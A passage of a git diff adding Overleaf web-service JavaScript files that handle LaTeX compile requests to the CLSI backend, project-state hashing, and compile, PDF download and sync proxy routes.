empty. Ignore JSON parsing errors. + } + + return { body: json } + } else { + return await _makeRequest( + projectId, + userId, + compileGroup, + compileBackendClass, + url, + opts + ) + } +} + +async function _makeRequest( + projectId, + userId, + compileGroup, + compileBackendClass, + url, + opts +) { + const currentBackendStartTime = new Date() + const clsiServerId = await ClsiCookieManager.promises.getServerId( + projectId, + userId, + compileGroup, + compileBackendClass + ) + opts.headers = { + Accept: 'application/json', + 'Content-Type': 'application/json', + } + + if (CLSI_COOKIES_ENABLED) { + const cookie = new Cookie({ + key: Settings.clsiCookie.key, + value: clsiServerId, + }) + opts.headers.Cookie = cookie.cookieString() + } + + const timer = new Metrics.Timer('compile.currentBackend') + + let response, body + try { + ;({ body, response } = await fetchStringWithResponse(url, opts)) + } catch (err) { + throw OError.tag(err, 'error making request to CLSI', { + projectId, + userId, + }) + } + + Metrics.inc(`compile.currentBackend.response.${response.status}`) + + let json + try { + json = JSON.parse(body) + } catch (err) { + // some responses are empty. Ignore JSON parsing errors + } + + timer.done() + let newClsiServerId + if (CLSI_COOKIES_ENABLED) { + newClsiServerId = _getClsiServerIdFromResponse(response) + await ClsiCookieManager.promises.setServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + newClsiServerId, + clsiServerId + ) + } + const currentCompileTime = new Date() - currentBackendStartTime + + // Start new backend request in the background + const newBackendStartTime = new Date() + _makeNewBackendRequest( + projectId, + userId, + compileGroup, + compileBackendClass, + url, + opts + ) + .then(result => { + if (result == null) { + return + } + const { response: newBackendResponse } = result + Metrics.inc(`compile.newBackend.response.${newBackendResponse.status}`) + const newBackendCompileTime = new Date() - newBackendStartTime + const currentStatusCode = response.status + const newStatusCode = newBackendResponse.status + const statusCodeSame = newStatusCode === currentStatusCode + const timeDifference = newBackendCompileTime - currentCompileTime + logger.debug( + { + statusCodeSame, + timeDifference, + currentCompileTime, + newBackendCompileTime, + projectId, + }, + 'both clsi requests returned' + ) + }) + .catch(err => { + logger.warn({ err }, 'Error making request to new CLSI backend') + }) + + return { + body: json, + clsiServerId: newClsiServerId || clsiServerId, + } +} + +async function _makeNewBackendRequest( + projectId, + userId, + compileGroup, + compileBackendClass, + url, + opts +) { + if (Settings.apis.clsi_new?.url == null) { + return null + } + url = url + .toString() + .replace(Settings.apis.clsi.url, Settings.apis.clsi_new.url) + + const clsiServerId = + await NewBackendCloudClsiCookieManager.promises.getServerId( + projectId, + userId, + compileGroup, + compileBackendClass + ) + opts.headers = { + Accept: 'application/json', + 'Content-Type': 'application/json', + } + + if (CLSI_COOKIES_ENABLED) { + const cookie = new Cookie({ + key: Settings.clsiCookie.key, + value: clsiServerId, + }) + opts.headers.Cookie = cookie.cookieString() + } + + const timer = new Metrics.Timer('compile.newBackend') + + let response, body + try { + ;({ body, response } = await fetchStringWithResponse(url, opts)) + } catch (err) { + throw OError.tag(err, 'error making request to new CLSI', { + userId, + projectId, + }) + } + + let json + try { + json = JSON.parse(body) + } catch (err) { + // Some responses are empty. Ignore JSON parsing errors + } + timer.done() + if (CLSI_COOKIES_ENABLED) { + const newClsiServerId = _getClsiServerIdFromResponse(response) + await NewBackendCloudClsiCookieManager.promises.setServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + newClsiServerId, + clsiServerId + ) + } + return { response, body: json } +} + +function _getCompilerUrl( + compileBackendClass, + compileGroup, + projectId, + userId, + action +) { + const u = new URL(`/project/${projectId}`, Settings.apis.clsi.url) + if (userId != null) { + u.pathname += `/user/${userId}` + } + if (action != null) { + u.pathname += `/${action}` + } + u.searchParams.set('compileBackendClass', compileBackendClass) + u.searchParams.set('compileGroup', compileGroup) + return u +} + +async function _postToClsi( + projectId, + userId, + req, + compileBackendClass, + compileGroup +) { + const url = _getCompilerUrl( + compileBackendClass, + compileGroup, + projectId, + userId, + 'compile' + ) + const opts = { + json: req, + method: 'POST', + signal: AbortSignal.timeout(COMPILE_REQUEST_TIMEOUT_MS), + } + try { + const { body, clsiServerId } = await _makeRequest( + projectId, + userId, + compileGroup, + compileBackendClass, + url, + opts + ) + return { response: body, clsiServerId } + } catch (err) { + if (err instanceof RequestFailedError) { + if (err.response.status === 413) { + return { response: { compile: { status: 'project-too-large' } } } + } else if (err.response.status === 409) { + return { response: { compile: { status: 'conflict' } } } + } else if (err.response.status === 423) { + return { response: { compile: { status: 'compile-in-progress' } } } + } else if (err.response.status === 503) { + return { response: { compile: { status: 'unavailable' } } } + } else { + throw new OError( + `CLSI returned non-success code: ${err.response.status}`, + { + projectId, + userId, + compileOptions: req.compile.options, + rootResourcePath: req.compile.rootResourcePath, + clsiResponse: err.body, + statusCode: err.response.status, + } + ) + } + } else { + throw new OError( + 'failed to make request to CLSI', + { + projectId, + userId, + compileOptions: req.compile.options, + rootResourcePath: req.compile.rootResourcePath, + }, + err + ) + } + } +} + +function _parseOutputFiles(projectId, rawOutputFiles = []) { + const outputFiles = [] + for (const file of rawOutputFiles) { + const f = { + path: file.path, // the clsi is now sending this to web + url: new URL(file.url).pathname, // the location of the file on the clsi, excluding the host part + type: file.type, + build: file.build, + } + if (file.path === 'output.pdf') { + f.contentId = file.contentId + f.ranges = file.ranges || [] + f.size = file.size + f.startXRefTable = file.startXRefTable + f.createdAt = new Date() + } + outputFiles.push(f) + } + return outputFiles +} + +async function _buildRequest(projectId, options) { + const project = await ProjectGetter.promises.getProject(projectId, { + compiler: 1, + rootDoc_id: 1, + imageName: 1, + rootFolder: 1, + 'overleaf.history.id': 1, + }) + if (project == null) { + throw new Errors.NotFoundError(`project does not exist: ${projectId}`) + } + if (!VALID_COMPILERS.includes(project.compiler)) { + project.compiler = 'pdflatex' + } + + if (options.incrementalCompilesEnabled || options.syncType != null) { + // new way, either incremental or full + const timer = new Metrics.Timer('editor.compile-getdocs-redis') + let projectStateHash, docUpdaterDocs + try { + ;({ projectStateHash, docs: docUpdaterDocs } = + await getContentFromDocUpdaterIfMatch(projectId, project, options)) + } catch (err) { + logger.error({ err, projectId }, 'error checking project state') + // note: we don't bail out when there's an error getting + // incremental files from the docupdater, we just fall back + // to a normal compile below + } + timer.done() + // see if we can send an incremental update to the CLSI + if (docUpdaterDocs != null && options.syncType !== 'full') { + Metrics.inc('compile-from-redis') + return _buildRequestFromDocupdater( + projectId, + options, + project, + projectStateHash, + docUpdaterDocs + ) + } else { + Metrics.inc('compile-from-mongo') + return await _buildRequestFromMongo( + projectId, + options, + project, + projectStateHash + ) + } + } else { + // old way, always from mongo + const timer = new Metrics.Timer('editor.compile-getdocs-mongo') + const { docs, files } = await _getContentFromMongo(projectId) + timer.done() + return _finaliseRequest(projectId, options, project, docs, files) + } +} + +async function getContentFromDocUpdaterIfMatch(projectId, project, options) { + const projectStateHash = ClsiStateManager.computeHash(project, options) + const docs = await DocumentUpdaterHandler.promises.getProjectDocsIfMatch( + projectId, + projectStateHash + ) + return { projectStateHash, docs } +} + +async function getOutputFileStream( + projectId, + userId, + options, + clsiServerId, + buildId, + outputFilePath +) { + const { compileBackendClass, compileGroup } = options + const url = new URL( + `${Settings.apis.clsi.url}/project/${projectId}/user/${userId}/build/${buildId}/output/${outputFilePath}` + ) + url.searchParams.set('compileBackendClass', compileBackendClass) + url.searchParams.set('compileGroup', compileGroup) + url.searchParams.set('clsiserverid', clsiServerId) + try { + const stream = await fetchStream(url, { + signal: AbortSignal.timeout(OUTPUT_FILE_TIMEOUT_MS), + }) + return stream + } catch (err) { + throw new Errors.OutputFileFetchFailedError( + 'failed to fetch output file from CLSI', + { + projectId, + userId, + url, + status: err.response?.status, + } + ) + } +} + +function _buildRequestFromDocupdater( + projectId, + options, + project, + projectStateHash, + docUpdaterDocs +) { + const docPath = ProjectEntityHandler.getAllDocPathsFromProject(project) + const docs = {} + for (const doc of docUpdaterDocs || []) { + const path = docPath[doc._id] + docs[path] = doc + } + // send new docs but not files as those are already on the clsi + options = _.clone(options) + options.syncType = 'incremental' + options.syncState = projectStateHash + // create stub doc entries for any possible root docs, if not + // present in the docupdater. This allows finaliseRequest to + // identify the root doc. + const possibleRootDocIds = [options.rootDoc_id, project.rootDoc_id] + for (const rootDocId of possibleRootDocIds) { + if (rootDocId != null && rootDocId in docPath) { + const path = docPath[rootDocId] + if (docs[path] == null) { + docs[path] = { _id: rootDocId, path } + } + } + } + return _finaliseRequest(projectId, options, project, docs, []) +} + +async function _buildRequestFromMongo( + projectId, + options, + project, + projectStateHash +) { + const { docs, files } = await _getContentFromMongo(projectId) + options = { + ...options, + syncType: 'full', + syncState: projectStateHash, + } + return _finaliseRequest(projectId, options, project, docs, files) +} + +async function _getContentFromMongo(projectId) { + await DocumentUpdaterHandler.promises.flushProjectToMongo(projectId) + const docs = await ProjectEntityHandler.promises.getAllDocs(projectId) + const files = await ProjectEntityHandler.promises.getAllFiles(projectId) + return { docs, files } +} + +function _finaliseRequest(projectId, options, project, docs, files) { + const resources = [] + let flags + let rootResourcePath = null + let rootResourcePathOverride = null + let hasMainFile = false + let numberOfDocsInProject = 0 + + for (let path in docs) { + const doc = docs[path] + path = path.replace(/^\//, '') // Remove leading / + numberOfDocsInProject++ + if (doc.lines != null) { + // add doc to resources unless it is just a stub entry + resources.push({ + path, + content: doc.lines.join('\n'), + }) + } + if ( + project.rootDoc_id != null && + doc._id.toString() === project.rootDoc_id.toString() + ) { + rootResourcePath = path + } + if ( + options.rootDoc_id != null && + doc._id.toString() === options.rootDoc_id.toString() + ) { + rootResourcePathOverride = path + } + if (path === 'main.tex') { + hasMainFile = true + } + } + + if (rootResourcePathOverride != null) { + rootResourcePath = rootResourcePathOverride + } + if (rootResourcePath == null) { + if (hasMainFile) { + rootResourcePath = 'main.tex' + } else if (numberOfDocsInProject === 1) { + // only one file, must be the main document + for (const path in docs) { + // Remove leading / + rootResourcePath = path.replace(/^\//, '') + } + } else { + throw new OError('no main file specified', { projectId }) + } + } + + const historyId = project.overleaf.history.id + if (!historyId) { + throw new OError('project does not have a history id', { projectId }) + } + for (let path in files) { + const file = files[path] + path = path.replace(/^\//, '') // Remove leading / + + const filestoreURL = `${Settings.apis.filestore.url}/project/${project._id}/file/${file._id}` + let url = filestoreURL + let fallbackURL + if (file.hash && Features.hasFeature('project-history-blobs')) { + const { bucket, key } = getBlobLocation(historyId, file.hash) + url = `${Settings.apis.filestore.url}/bucket/${bucket}/key/${key}` + fallbackURL = filestoreURL + } + resources.push({ + path, + url, + fallbackURL, + modified: file.created?.getTime(), + }) + } + + if (options.fileLineErrors) { + flags = ['-file-line-error'] + } + + return { + compile: { + options: { + buildId: options.buildId, + editorId: options.editorId, + compiler: project.compiler, + timeout: options.timeout, + imageName: project.imageName, + draft: Boolean(options.draft), + stopOnFirstError: Boolean(options.stopOnFirstError), + check: options.check, + syncType: options.syncType, + syncState: options.syncState, + compileGroup: options.compileGroup, + compileFromClsiCache: options.compileFromClsiCache, + populateClsiCache: options.populateClsiCache, + enablePdfCaching: + (Settings.enablePdfCaching && options.enablePdfCaching) || false, + pdfCachingMinChunkSize: options.pdfCachingMinChunkSize, + flags, + metricsMethod: options.compileGroup, + }, + rootResourcePath, + resources, + }, + } +} + +async function wordCount(projectId, userId, file, options, clsiserverid) { + const { compileBackendClass, compileGroup } = options + const req = await _buildRequest(projectId, options) + const filename = file || req.compile.rootResourcePath + const url = _getCompilerUrl( + compileBackendClass, + compileGroup, + projectId, + userId, + 'wordcount' + ) + url.searchParams.set('file', filename) + url.searchParams.set('image', req.compile.options.imageName) + + const opts = { + method: 'GET', + } + const { body } = await _makeRequestWithClsiServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + url, + opts, + clsiserverid + ) + return body +} + +function _getClsiServerIdFromResponse(response) { + const setCookieHeaders = response.headers.raw()['set-cookie'] ?? [] + for (const header of setCookieHeaders) { + const cookie = Cookie.parse(header) + if (cookie.key === Settings.clsiCookie.key) { + return cookie.value + } + } + return null +} + +module.exports = { + sendRequest: callbackifyMultiResult(sendRequest, [ + 'status', + 'outputFiles', + 'clsiServerId', + 'validationProblems', + 'stats', + 'timings', + 'outputUrlPrefix', + 'buildId', + ]), + sendExternalRequest: callbackifyMultiResult(sendExternalRequest, [ + 'status', + 'outputFiles', + 'clsiServerId', + 'validationProblems', + 'stats', + 'timings', + 'outputUrlPrefix', + ]), + stopCompile: callbackify(stopCompile), + deleteAuxFiles: callbackify(deleteAuxFiles), + getOutputFileStream: callbackify(getOutputFileStream), + wordCount: callbackify(wordCount), + promises: { + sendRequest, + sendExternalRequest, + stopCompile, + deleteAuxFiles, + getOutputFileStream, + wordCount, + }, +} diff --git a/services/web/app/src/Features/Compile/ClsiStateManager.js b/services/web/app/src/Features/Compile/ClsiStateManager.js new file mode 100644 index 0000000..e1914b9 --- /dev/null +++ b/services/web/app/src/Features/Compile/ClsiStateManager.js @@ -0,0 +1,72 @@ +/* eslint-disable + n/handle-callback-err, + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let ClsiStateManager +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const crypto = require('crypto') +const ProjectEntityHandler = require('../Project/ProjectEntityHandler') + +// The "state" of a project is a hash of the relevant attributes in the +// project object in this case we only need the rootFolder. +// +// The idea is that it will change if any doc or file is +// created/renamed/deleted, and also if the content of any file (not +// doc) changes. +// +// When the hash changes the full set of files on the CLSI will need to +// be updated. If it doesn't change then we can overwrite changed docs +// in place on the clsi, getting them from the docupdater. +// +// The docupdater is responsible for setting the key in redis, and +// unsetting it if it removes any documents from the doc updater. + +const buildState = s => + crypto.createHash('sha1').update(s, 'utf8').digest('hex') + +module.exports = ClsiStateManager = { + computeHash(project, options) { + const { docs, files } = + ProjectEntityHandler.getAllEntitiesFromProject(project) + const fileList = Array.from(files || []).map( + f => `${f.file._id}:${f.file.rev}:${f.file.created}:${f.path}` + ) + const docList = Array.from(docs || []).map(d => `${d.doc._id}:${d.path}`) + const sortedEntityList = [ + ...Array.from(docList), + ...Array.from(fileList), + ].sort() + // ignore the isAutoCompile options as it doesn't affect the + // output, but include all other options e.g. draft + const optionsList = (() => { + const result = [] + const object = options || {} + for (const key in object) { + const value = object[key] + if (!['isAutoCompile'].includes(key)) { + result.push(`option ${key}:${value}`) + } + } + return result + })() + const sortedOptionsList = optionsList.sort() + const hash = buildState( + [...Array.from(sortedEntityList), ...Array.from(sortedOptionsList)].join( + '\n' + ) + ) + return hash + }, +} diff --git a/services/web/app/src/Features/Compile/CompileController.js b/services/web/app/src/Features/Compile/CompileController.js new file mode 100644 index 0000000..c981e93 --- /dev/null +++ b/services/web/app/src/Features/Compile/CompileController.js @@ -0,0 +1,802 @@ +let CompileController +const { URL, URLSearchParams } = require('url') +const { pipeline } = require('stream/promises') +const { Cookie } = require('tough-cookie') +const OError = require('@overleaf/o-error') +const Metrics = require('@overleaf/metrics') +const ProjectGetter = require('../Project/ProjectGetter') +const CompileManager = require('./CompileManager') +const ClsiManager = require('./ClsiManager') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const SessionManager = require('../Authentication/SessionManager') +const { RateLimiter } = require('../../infrastructure/RateLimiter') +const ClsiCookieManager = require('./ClsiCookieManager')( + Settings.apis.clsi?.backendGroupName +) +const Path = require('path') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const SplitTestHandler = require('../SplitTests/SplitTestHandler') +const { callbackify } = require('@overleaf/promise-utils') +const { + fetchStreamWithResponse, + RequestFailedError, +} = require('@overleaf/fetch-utils') + +const COMPILE_TIMEOUT_MS = 10 * 60 * 1000 + +const pdfDownloadRateLimiter = new RateLimiter('full-pdf-download', { + points: 1000, + duration: 60 * 60, +}) + +function getOutputFilesArchiveSpecification(projectId, userId, buildId) { + const fileName = 'output.zip' + return { + path: fileName, + url: CompileController._getFileUrl(projectId, userId, buildId, fileName), + type: 'zip', + } +} + +function getImageNameForProject(projectId, callback) { + ProjectGetter.getProject(projectId, { imageName: 1 }, (err, project) => { + if (err) return callback(err) + if (!project) return callback(new Error('project not found')) + callback(null, project.imageName) + }) +} + +async function getPdfCachingMinChunkSize(req, res) { + const { variant } = await SplitTestHandler.promises.getAssignment( + req, + res, + 'pdf-caching-min-chunk-size' + ) + if (variant === 'default') return 1_000_000 + return parseInt(variant, 10) +} + +async function _getSplitTestOptions(req, res) { + // Use the query flags from the editor request for overriding the split test. + let query = {} + try { + const u = new URL(req.headers.referer || req.url, Settings.siteUrl) + query = Object.fromEntries(u.searchParams.entries()) + } catch (e) {} + const editorReq = { ...req, query } + + // Lookup the clsi-cache flag in the backend. + // We may need to turn off the feature on a short notice, without requiring + // all users to reload their editor page to disable the feature. + const { variant: compileFromClsiCacheVariant } = + await SplitTestHandler.promises.getAssignment( + editorReq, + res, + 'compile-from-clsi-cache' + ) + const compileFromClsiCache = compileFromClsiCacheVariant === 'enabled' + const { variant: populateClsiCacheVariant } = + await SplitTestHandler.promises.getAssignment( + editorReq, + res, + 'populate-clsi-cache' + ) + const populateClsiCache = populateClsiCacheVariant === 'enabled' + + const pdfDownloadDomain = Settings.pdfDownloadDomain + + if (!req.query.enable_pdf_caching) { + // The frontend does not want to do pdf caching. + return { + compileFromClsiCache, + populateClsiCache, + pdfDownloadDomain, + enablePdfCaching: false, + } + } + + // Double check with the latest split test assignment. + // We may need to turn off the feature on a short notice, without requiring + // all users to reload their editor page to disable the feature. + const { variant } = await SplitTestHandler.promises.getAssignment( + editorReq, + res, + 'pdf-caching-mode' + ) + const enablePdfCaching = variant === 'enabled' + if (!enablePdfCaching) { + // Skip the lookup of the chunk size when caching is not enabled. + return { + compileFromClsiCache, + populateClsiCache, + pdfDownloadDomain, + enablePdfCaching: false, + } + } + const pdfCachingMinChunkSize = await getPdfCachingMinChunkSize(editorReq, res) + return { + compileFromClsiCache, + populateClsiCache, + pdfDownloadDomain, + enablePdfCaching, + pdfCachingMinChunkSize, + } +} +const getSplitTestOptionsCb = callbackify(_getSplitTestOptions) + +module.exports = CompileController = { + compile(req, res, next) { + res.setTimeout(COMPILE_TIMEOUT_MS) + const projectId = req.params.Project_id + const isAutoCompile = !!req.query.auto_compile + const fileLineErrors = !!req.query.file_line_errors + const stopOnFirstError = !!req.body.stopOnFirstError + const userId = SessionManager.getLoggedInUserId(req.session) + const options = { + isAutoCompile, + fileLineErrors, + stopOnFirstError, + editorId: req.body.editorId, + } + + if (req.body.rootDoc_id) { + options.rootDoc_id = req.body.rootDoc_id + } else if ( + req.body.settingsOverride && + req.body.settingsOverride.rootDoc_id + ) { + // Can be removed after deploy + options.rootDoc_id = req.body.settingsOverride.rootDoc_id + } + if (req.body.compiler) { + options.compiler = req.body.compiler + } + if (req.body.draft) { + options.draft = req.body.draft + } + if (['validate', 'error', 'silent'].includes(req.body.check)) { + options.check = req.body.check + } + if (req.body.incrementalCompilesEnabled) { + options.incrementalCompilesEnabled = true + } + + getSplitTestOptionsCb(req, res, (err, splitTestOptions) => { + if (err) return next(err) + let { + compileFromClsiCache, + populateClsiCache, + enablePdfCaching, + pdfCachingMinChunkSize, + pdfDownloadDomain, + } = splitTestOptions + options.compileFromClsiCache = compileFromClsiCache + options.populateClsiCache = populateClsiCache + options.enablePdfCaching = enablePdfCaching + if (enablePdfCaching) { + options.pdfCachingMinChunkSize = pdfCachingMinChunkSize + } + + CompileManager.compile( + projectId, + userId, + options, + ( + error, + status, + outputFiles, + clsiServerId, + limits, + validationProblems, + stats, + timings, + outputUrlPrefix, + buildId + ) => { + if (error) { + Metrics.inc('compile-error') + return next(error) + } + Metrics.inc('compile-status', 1, { status }) + if (pdfDownloadDomain && outputUrlPrefix) { + pdfDownloadDomain += outputUrlPrefix + } + + if ( + limits && + SplitTestHandler.getPercentile( + AnalyticsManager.getIdsFromSession(req.session).analyticsId, + 'compile-result-backend', + 'release' + ) === 1 + ) { + // For a compile request to be sent to clsi we need limits. + // If we get here without having the limits object populated, it is + // a reasonable assumption to make that nothing was compiled. + // We need to know the limits in order to make use of the events. + AnalyticsManager.recordEventForSession( + req.session, + 'compile-result-backend', + { + projectId, + ownerAnalyticsId: limits.ownerAnalyticsId, + status, + compileTime: timings?.compileE2E, + timeout: limits.timeout === 60 ? 'short' : 'long', + server: clsiServerId?.includes('-c2d-') ? 'faster' : 'normal', + isAutoCompile, + isInitialCompile: stats?.isInitialCompile === 1, + restoredClsiCache: stats?.restoredClsiCache === 1, + stopOnFirstError, + } + ) + } + + const outputFilesArchive = buildId + ? getOutputFilesArchiveSpecification(projectId, userId, buildId) + : null + + res.json({ + status, + outputFiles, + outputFilesArchive, + compileGroup: limits?.compileGroup, + clsiServerId, + validationProblems, + stats, + timings, + outputUrlPrefix, + pdfDownloadDomain, + pdfCachingMinChunkSize, + }) + } + ) + }) + }, + + stopCompile(req, res, next) { + const projectId = req.params.Project_id + const userId = SessionManager.getLoggedInUserId(req.session) + CompileManager.stopCompile(projectId, userId, function (error) { + if (error) { + return next(error) + } + res.sendStatus(200) + }) + }, + + // Used for submissions through the public API + compileSubmission(req, res, next) { + res.setTimeout(COMPILE_TIMEOUT_MS) + const submissionId = req.params.submission_id + const options = {} + if (req.body?.rootResourcePath != null) { + options.rootResourcePath = req.body.rootResourcePath + } + if (req.body?.compiler) { + options.compiler = req.body.compiler + } + if (req.body?.draft) { + options.draft = req.body.draft + } + if (['validate', 'error', 'silent'].includes(req.body?.check)) { + options.check = req.body.check + } + options.compileGroup = + req.body?.compileGroup || Settings.defaultFeatures.compileGroup + options.compileBackendClass = Settings.apis.clsi.submissionBackendClass + options.timeout = + req.body?.timeout || Settings.defaultFeatures.compileTimeout + ClsiManager.sendExternalRequest( + submissionId, + req.body, + options, + function (error, status, outputFiles, clsiServerId, validationProblems) { + if (error) { + return next(error) + } + res.json({ + status, + outputFiles, + clsiServerId, + validationProblems, + }) + } + ) + }, + + _getSplitTestOptions, + + _getUserIdForCompile(req) { + if (!Settings.disablePerUserCompiles) { + return SessionManager.getLoggedInUserId(req.session) + } + return null + }, + _compileAsUser(req, callback) { + callback(null, CompileController._getUserIdForCompile(req)) + }, + _downloadAsUser(req, callback) { + callback(null, CompileController._getUserIdForCompile(req)) + }, + + downloadPdf(req, res, next) { + Metrics.inc('pdf-downloads') + const projectId = req.params.Project_id + const rateLimit = function (callback) { + pdfDownloadRateLimiter + .consume(req.ip, 1, { method: 'ip' }) + .then(() => { + callback(null, true) + }) + .catch(err => { + if (err instanceof Error) { + callback(err) + } else { + callback(null, false) + } + }) + } + + ProjectGetter.getProject(projectId, { name: 1 }, function (err, project) { + if (err) { + return next(err) + } + res.contentType('application/pdf') + const filename = `${CompileController._getSafeProjectName(project)}.pdf` + + if (req.query.popupDownload) { + res.setContentDisposition('attachment', { filename }) + } else { + res.setContentDisposition('inline', { filename }) + } + + rateLimit(function (err, canContinue) { + if (err) { + logger.err({ err }, 'error checking rate limit for pdf download') + res.sendStatus(500) + } else if (!canContinue) { + logger.debug( + { projectId, ip: req.ip }, + 'rate limit hit downloading pdf' + ) + res.sendStatus(500) + } else { + CompileController._downloadAsUser(req, function (error, userId) { + if (error) { + return next(error) + } + const url = CompileController._getFileUrl( + projectId, + userId, + req.params.build_id, + 'output.pdf' + ) + CompileController.proxyToClsi( + projectId, + 'output-file', + url, + {}, + req, + res, + next + ) + }) + } + }) + }) + }, + + _getSafeProjectName(project) { + return project.name.replace(/[^\p{L}\p{Nd}]/gu, '_') + }, + + deleteAuxFiles(req, res, next) { + const projectId = req.params.Project_id + const { clsiserverid } = req.query + CompileController._compileAsUser(req, function (error, userId) { + if (error) { + return next(error) + } + CompileManager.deleteAuxFiles( + projectId, + userId, + clsiserverid, + function (error) { + if (error) { + return next(error) + } + res.sendStatus(200) + } + ) + }) + }, + + // this is only used by templates, so is not called with a userId + compileAndDownloadPdf(req, res, next) { + const projectId = req.params.project_id + // pass userId as null, since templates are an "anonymous" compile + CompileManager.compile(projectId, null, {}, (err, _status, outputFiles) => { + if (err) { + logger.err( + { err, projectId }, + 'something went wrong compile and downloading pdf' + ) + res.sendStatus(500) + return + } + const pdf = outputFiles.find(f => f.path === 'output.pdf') + if (!pdf) { + logger.warn( + { projectId }, + 'something went wrong compile and downloading pdf: no pdf' + ) + res.sendStatus(500) + return + } + CompileController.proxyToClsi( + projectId, + 'output-file', + pdf.url, + {}, + req, + res, + next + ) + }) + }, + + getFileFromClsi(req, res, next) { + const projectId = req.params.Project_id + CompileController._downloadAsUser(req, function (error, userId) { + if (error) { + return next(error) + } + + const qs = {} + + const url = CompileController._getFileUrl( + projectId, + userId, + req.params.build_id, + req.params.file + ) + CompileController.proxyToClsi( + projectId, + 'output-file', + url, + qs, + req, + res, + next + ) + }) + }, + + getFileFromClsiWithoutUser(req, res, next) { + const submissionId = req.params.submission_id + const url = CompileController._getFileUrl( + submissionId, + null, + req.params.build_id, + req.params.file + ) + const limits = { + compileGroup: + req.body?.compileGroup || + req.query?.compileGroup || + Settings.defaultFeatures.compileGroup, + compileBackendClass: Settings.apis.clsi.submissionBackendClass, + } + CompileController.proxyToClsiWithLimits( + submissionId, + 'output-file', + url, + {}, + limits, + req, + res, + next + ) + }, + + // compute a GET file url for a given project, user (optional), build (optional) and file + _getFileUrl(projectId, userId, buildId, file) { + let url + if (userId != null && buildId != null) { + url = `/project/${projectId}/user/${userId}/build/${buildId}/output/${file}` + } else if (userId != null) { + url = `/project/${projectId}/user/${userId}/output/${file}` + } else if (buildId != null) { + url = `/project/${projectId}/build/${buildId}/output/${file}` + } else { + url = `/project/${projectId}/output/${file}` + } + return url + }, + + // compute a POST url for a project, user (optional) and action + _getUrl(projectId, userId, action) { + let path = `/project/${projectId}` + if (userId != null) { + path += `/user/${userId}` + } + return `${path}/${action}` + }, + + proxySyncPdf(req, res, next) { + const projectId = req.params.Project_id + const { page, h, v, editorId, buildId } = req.query + if (!page?.match(/^\d+$/)) { + return next(new Error('invalid page parameter')) + } + if (!h?.match(/^-?\d+\.\d+$/)) { + return next(new Error('invalid h parameter')) + } + if (!v?.match(/^-?\d+\.\d+$/)) { + return next(new Error('invalid v parameter')) + } + // whether this request is going to a per-user container + CompileController._compileAsUser(req, function (error, userId) { + if (error) { + return next(error) + } + getImageNameForProject(projectId, (error, imageName) => { + if (error) return next(error) + + getSplitTestOptionsCb(req, res, (error, splitTestOptions) => { + if (error) return next(error) + const { compileFromClsiCache } = splitTestOptions + + const url = CompileController._getUrl(projectId, userId, 'sync/pdf') + + CompileController.proxyToClsi( + projectId, + 'sync-to-pdf', + url, + { page, h, v, imageName, editorId, buildId, compileFromClsiCache }, + req, + res, + next + ) + }) + }) + }) + }, + + proxySyncCode(req, res, next) { + const projectId = req.params.Project_id + const { file, line, column, editorId, buildId } = req.query + if (file == null) { + return next(new Error('missing file parameter')) + } + // Check that we are dealing with a simple file path (this is not + // strictly needed because synctex uses this parameter as a label + // to look up in the synctex output, and does not open the file + // itself). Since we have valid synctex paths like foo/./bar we + // allow those by replacing /./ with / + const testPath = file.replace('/./', '/') + if (Path.resolve('/', testPath) !== `/${testPath}`) { + return next(new Error('invalid file parameter')) + } + if (!line?.match(/^\d+$/)) { + return next(new Error('invalid line parameter')) + } + if (!column?.match(/^\d+$/)) { + return next(new Error('invalid column parameter')) + } + CompileController._compileAsUser(req, function (error, userId) { + if (error) { + return next(error) + } + getImageNameForProject(projectId, (error, imageName) => { + if (error) return next(error) + + getSplitTestOptionsCb(req, res, (error, splitTestOptions) => { + if (error) return next(error) + const { compileFromClsiCache } = splitTestOptions + + const url = CompileController._getUrl(projectId, userId, 'sync/code') + CompileController.proxyToClsi( + projectId, + 'sync-to-code', + url, + { + file, + line, + column, + imageName, + editorId, + buildId, + compileFromClsiCache, + }, + req, + res, + next + ) + }) + }) + }) + }, + + proxyToClsi(projectId, action, url, qs, req, res, next) { + CompileManager.getProjectCompileLimits(projectId, function (error, limits) { + if (error) { + return next(error) + } + CompileController.proxyToClsiWithLimits( + projectId, + action, + url, + qs, + limits, + req, + res, + next + ) + }) + }, + + proxyToClsiWithLimits(projectId, action, url, qs, limits, req, res, next) { + _getPersistenceOptions( + req, + projectId, + limits.compileGroup, + limits.compileBackendClass, + (err, persistenceOptions) => { + if (err) { + OError.tag(err, 'error getting cookie jar for clsi request') + return next(err) + } + url = new URL(`${Settings.apis.clsi.url}${url}`) + url.search = new URLSearchParams({ + ...persistenceOptions.qs, + ...qs, + }).toString() + const timer = new Metrics.Timer( + 'proxy_to_clsi', + 1, + { path: action }, + [0, 100, 1000, 2000, 5000, 10000, 15000, 20000, 30000, 45000, 60000] + ) + Metrics.inc('proxy_to_clsi', 1, { path: action, status: 'start' }) + fetchStreamWithResponse(url.href, { + method: req.method, + signal: AbortSignal.timeout(60 * 1000), + headers: persistenceOptions.headers, + }) + .then(({ stream, response }) => { + if (req.destroyed) { + // The client has disconnected already, avoid trying to write into the broken connection. + Metrics.inc('proxy_to_clsi', 1, { + path: action, + status: 'req-aborted', + }) + return + } + Metrics.inc('proxy_to_clsi', 1, { + path: action, + status: response.status, + }) + + for (const key of ['Content-Length', 'Content-Type']) { + if (response.headers.has(key)) { + res.setHeader(key, response.headers.get(key)) + } + } + res.writeHead(response.status) + return pipeline(stream, res) + }) + .then(() => { + timer.labels.status = 'success' + timer.done() + }) + .catch(err => { + const reqAborted = Boolean(req.destroyed) + const status = reqAborted ? 'req-aborted-late' : 'error' + timer.labels.status = status + const duration = timer.done() + Metrics.inc('proxy_to_clsi', 1, { path: action, status }) + const streamingStarted = Boolean(res.headersSent) + if (!streamingStarted) { + if (err instanceof 